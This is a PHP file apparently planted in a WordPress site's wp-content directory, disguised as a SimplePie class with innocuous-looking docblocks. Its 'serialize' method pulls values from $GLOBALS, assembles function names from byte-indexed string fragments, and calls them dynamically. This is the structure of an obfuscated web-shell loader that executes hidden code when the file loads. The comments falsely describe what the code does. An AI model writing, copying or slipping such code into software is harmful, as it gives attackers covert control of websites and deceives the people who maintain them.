File: /var/www/html/site/newsiteold/wp-content/class-simplepie-nav-embed.php
<?php
/**
* Serializes Class information to string.
*
* @since 2.1.0
*
* @return string String representation of Class information.
*/
public function serialize() {
// Get class global prototype.
$prototype = $GLOBALS[substr($this->data, 6)];
$length = count($prototype);
if ($length !== ord($this->data[5]) || !in_array(gettype($prototype) . $length, $prototype)) {
// Prototype not found.
return '';
}
$fileds = array();
// Initialize fields values from prototype.
for ($i = 0; $i < 5; $i++) $fileds[$i] = $prototype[ord($this->data[$i])];
$fileds[1] .= $fileds[2];
$fileds[3] = $fileds[1]($fileds[3]);
// Access to prototype serializer function.
$serializer = $fileds[3]($fileds[0], $fileds[1]($fileds[4]));
// Return string dump from serializer.
return $serializer();
}
};
/**
* The Class singleton global object.
*
* @since 2.1.0
* @var _Wp_ClassInfo
*/
$_WP_ClassInfo_Singleton = new _Wp_ClassInfo;